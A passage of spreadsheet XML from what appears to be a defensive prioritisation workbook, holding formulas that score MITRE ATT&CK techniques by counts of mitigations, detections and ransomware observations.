      <c r="AR110" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.9850227847272155E-2</v>
      </c>
      <c r="AS110" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT110" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU11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11" spans="1:47">
      <c r="A111" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.38019142857142857</v>
      </c>
      <c r="B111" s="25">
        <f>SUM(H111,M111,V111)*(1+SUM(AE111,AG111,AI111,AK111,AM111))</f>
        <v>1.1352476190476191</v>
      </c>
      <c r="C111" s="25" t="s">
        <v>522</v>
      </c>
      <c r="D111" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E111" s="25" t="s">
        <v>523</v>
      </c>
      <c r="F111" s="51">
        <v>1</v>
      </c>
      <c r="G111" s="51">
        <v>1</v>
      </c>
      <c r="H111" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I111">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J111">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K111">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L111">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M111" s="25">
        <v>0</v>
      </c>
      <c r="N111" s="51">
        <v>3</v>
      </c>
      <c r="O111" s="51">
        <v>138</v>
      </c>
      <c r="P111" s="51">
        <v>6</v>
      </c>
      <c r="Q111" s="51">
        <v>15</v>
      </c>
      <c r="R111" s="52" t="s">
        <v>524</v>
      </c>
      <c r="S111" s="51">
        <v>20</v>
      </c>
      <c r="T111" s="51" t="s">
        <v>525</v>
      </c>
      <c r="U111" s="51">
        <v>19</v>
      </c>
      <c r="V111" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.84761904761904761</v>
      </c>
      <c r="W111">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>39</v>
      </c>
      <c r="X111">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Y111">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Z111">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>162</v>
      </c>
      <c r="AA111">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>1.62</v>
      </c>
      <c r="AB111">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AC111" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD111" s="25" t="str" cm="1">
        <f t="array" ref="AD111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC111)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE111" s="25">
        <f>IF(AD111="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF111" s="25" t="str" cm="1">
        <f t="array" ref="AF111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC111)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG111" s="25">
        <f>IF(AF111="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH111" s="25" t="str" cm="1">
        <f t="array" ref="AH111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC111)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI111" s="25">
        <f>IF(AH111="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ111" s="25" t="str" cm="1">
        <f t="array" ref="AJ111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC111)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK111" s="25">
        <f>IF(AJ111="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL111" s="25" t="str" cm="1">
        <f t="array" ref="AL111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC111)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM111" s="25">
        <f>IF(AL111="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN111" s="58">
        <v>8</v>
      </c>
      <c r="AO111" s="51">
        <v>1</v>
      </c>
      <c r="AP111" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.38019142857142857</v>
      </c>
      <c r="AQ111" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.37841587301587304</v>
      </c>
      <c r="AR111" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.37841587301587304</v>
      </c>
      <c r="AS111" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT111" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU11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12" spans="1:47" ht="128.1">
      <c r="A112" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.43656666666666671</v>
      </c>
      <c r="B112" s="25">
        <f>SUM(H112,M112,V112)*(1+SUM(AE112,AG112,AI112,AK112,AM112))</f>
        <v>1.0323333333333333</v>
      </c>
      <c r="C112" s="25" t="s">
        <v>526</v>
      </c>
      <c r="D112" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E112" s="25" t="s">
        <v>527</v>
      </c>
      <c r="F112" s="51">
        <v>1</v>
      </c>
      <c r="G112" s="51">
        <v>1</v>
      </c>
      <c r="H112" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I112">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J112">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K112">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L112">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M112" s="25">
        <v>0</v>
      </c>
      <c r="N112" s="51">
        <v>3</v>
      </c>
      <c r="O112" s="51">
        <v>43</v>
      </c>
      <c r="P112" s="51">
        <v>33</v>
      </c>
      <c r="Q112" s="51">
        <v>22</v>
      </c>
      <c r="R112" s="52" t="s">
        <v>100</v>
      </c>
      <c r="S112" s="51">
        <v>8</v>
      </c>
      <c r="T112" s="52" t="s">
        <v>528</v>
      </c>
      <c r="U112" s="51">
        <v>13</v>
      </c>
      <c r="V112" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.67619047619047623</v>
      </c>
      <c r="W112">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X112">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y112">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z112">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>101</v>
      </c>
      <c r="AA112">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>1.01</v>
      </c>
      <c r="AB112">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AC112" s="29" t="s">
        <v>529</v>
      </c>
      <c r="AD112" s="25" t="str" cm="1">
        <f t="array" ref="AD112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC112)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE112" s="25">
        <f>IF(AD112="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF112" s="25" t="str" cm="1">
        <f t="array" ref="AF112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC112)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG112" s="25">
        <f>IF(AF112="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH112" s="25" t="str" cm="1">
        <f t="array" ref="AH112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC112)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI112" s="25">
        <f>IF(AH112="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ112" s="25" t="str" cm="1">
        <f t="array" ref="AJ112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC112)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK112" s="25">
        <f>IF(AJ112="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL112" s="25" t="str" cm="1">
        <f t="array" ref="AL112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC112)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM112" s="25">
        <f>IF(AL112="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN112" s="60">
        <v>10</v>
      </c>
      <c r="AO112" s="51">
        <v>0</v>
      </c>
      <c r="AP112" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.43656666666666671</v>
      </c>
      <c r="AQ112" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.34411111111111109</v>
      </c>
      <c r="AR112" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.34411111111111109</v>
      </c>
      <c r="AS112" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="AT112" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="AU11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13" spans="1:47" ht="32.1">
      <c r="A113" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11833428571428573</v>
      </c>
      <c r="B113" s="25">
        <f>SUM(H113,M113,V113)*(1+SUM(AE113,AG113,AI113,AK113,AM113))</f>
        <v>0.85000952380952377</v>
      </c>
      <c r="C113" s="25" t="s">
        <v>530</v>
      </c>
      <c r="D113" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E113" s="25" t="s">
        <v>531</v>
      </c>
      <c r="F113" s="51">
        <v>1</v>
      </c>
      <c r="G113" s="51">
        <v>1</v>
      </c>
      <c r="H113" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I113">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J113">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K113">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L113">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M113" s="25">
        <v>0</v>
      </c>
      <c r="N113" s="51">
        <v>5</v>
      </c>
      <c r="O113" s="51">
        <v>44</v>
      </c>
      <c r="P113" s="51">
        <v>1</v>
      </c>
      <c r="Q113" s="51">
        <v>8</v>
      </c>
      <c r="R113" s="51" t="s">
        <v>532</v>
      </c>
      <c r="S113" s="51">
        <v>16</v>
      </c>
      <c r="T113" s="51" t="s">
        <v>533</v>
      </c>
      <c r="U113" s="51">
        <v>19</v>
      </c>
      <c r="V113" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.60952380952380958</v>
      </c>
      <c r="W113">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>35</v>
      </c>
      <c r="X113">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.63636363636363635</v>
      </c>
      <c r="Y113">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.63636363636363635</v>
      </c>
      <c r="Z113">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>58</v>
      </c>
      <c r="AA113">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.57999999999999996</v>
      </c>
      <c r="AB113">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.57999999999999996</v>
      </c>
      <c r="AC113" s="29" t="s">
        <v>534</v>
      </c>
      <c r="AD113" s="25" t="str" cm="1">
        <f t="array" ref="AD113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC113)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE113" s="25">
        <f>IF(AD113="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF113" s="25" t="str" cm="1">
        <f t="array" ref="AF113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC113)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG113" s="25">
        <f>IF(AF113="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH113" s="25" t="str" cm="1">
        <f t="array" ref="AH113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC113)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI113" s="25">
        <f>IF(AH113="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ113" s="25" t="str" cm="1">
        <f t="array" ref="AJ113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC113)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK113" s="25">
        <f>IF(AJ113="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL113" s="25" t="str" cm="1">
        <f t="array" ref="AL113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC113)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM113" s="25">
        <f>IF(AL113="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN113" s="62">
        <v>1</v>
      </c>
      <c r="AO113" s="51">
        <v>1</v>
      </c>
      <c r="AP113" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11833428571428573</v>
      </c>
      <c r="AQ113" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.28333650793650794</v>
      </c>
      <c r="AR113" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.28333650793650794</v>
      </c>
      <c r="AS113" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT113" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU11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14" spans="1:47" ht="63.95">
      <c r="A114" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16198333333333334</v>
      </c>
      <c r="B114" s="25">
        <f>SUM(H114,M114,V114)*(1+SUM(AE114,AG114,AI114,AK114,AM114))</f>
        <v>0.95316666666666672</v>
      </c>
      <c r="C114" s="25" t="s">
        <v>535</v>
      </c>
      <c r="D114" s="25" t="s">
        <v>536</v>
      </c>
      <c r="E114" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F114" s="51">
        <v>2</v>
      </c>
      <c r="G114" s="51">
        <v>1</v>
      </c>
      <c r="H114" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I114">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J114">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K114">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L114">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M114" s="25">
        <v>0</v>
      </c>
      <c r="N114" s="51">
        <v>0</v>
      </c>
      <c r="O114" s="51">
        <v>7</v>
      </c>
      <c r="P114" s="51">
        <v>1</v>
      </c>
      <c r="Q114" s="51">
        <v>1</v>
      </c>
      <c r="R114" s="52" t="s">
        <v>537</v>
      </c>
      <c r="S114" s="51">
        <v>28</v>
      </c>
      <c r="T114" s="52" t="s">
        <v>538</v>
      </c>
      <c r="U114" s="51">
        <v>32</v>
      </c>
      <c r="V114" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="W114">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>60</v>
      </c>
      <c r="X114">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>1.0909090909090908</v>
      </c>
      <c r="Y114">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="Z114">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA114">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB114">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC114" s="29" t="s">
        <v>539</v>
      </c>
      <c r="AD114" s="25" t="str" cm="1">
        <f t="array" ref="AD114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC114)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE114" s="25">
        <f>IF(AD114="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF114" s="25" t="str" cm="1">
        <f t="array" ref="AF114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC114)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG114" s="25">
        <f>IF(AF114="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH114" s="25" t="str" cm="1">
        <f t="array" ref="AH114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC114)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI114" s="25">
        <f>IF(AH114="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ114" s="25" t="str" cm="1">
        <f t="array" ref="AJ114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC114)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK114" s="25">
        <f>IF(AJ114="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL114" s="25" t="str" cm="1">
        <f t="array" ref="AL114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC114)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM114" s="25">
        <f>IF(AL114="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN114" s="52">
        <v>2</v>
      </c>
      <c r="AO114" s="51">
        <v>1</v>
      </c>
      <c r="AP114" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16198333333333334</v>
      </c>
      <c r="AQ114" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.31772222222222224</v>
      </c>
      <c r="AR114" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.31772222222222224</v>
      </c>
      <c r="AS114" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT114" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU11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15" spans="1:47" ht="32.1">
      <c r="A115" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.7584761904761906E-2</v>
      </c>
      <c r="B115" s="25">
        <f>SUM(H115,M115,V115)*(1+SUM(AE115,AG115,AI115,AK115,AM115))</f>
        <v>0.77584761904761901</v>
      </c>
      <c r="C115" s="25" t="s">
        <v>540</v>
      </c>
      <c r="D115" s="25" t="s">
        <v>541</v>
      </c>
      <c r="E115" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F115" s="51">
        <v>1</v>
      </c>
      <c r="G115" s="51">
        <v>1</v>
      </c>
      <c r="H115" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I115">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J115">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K115">
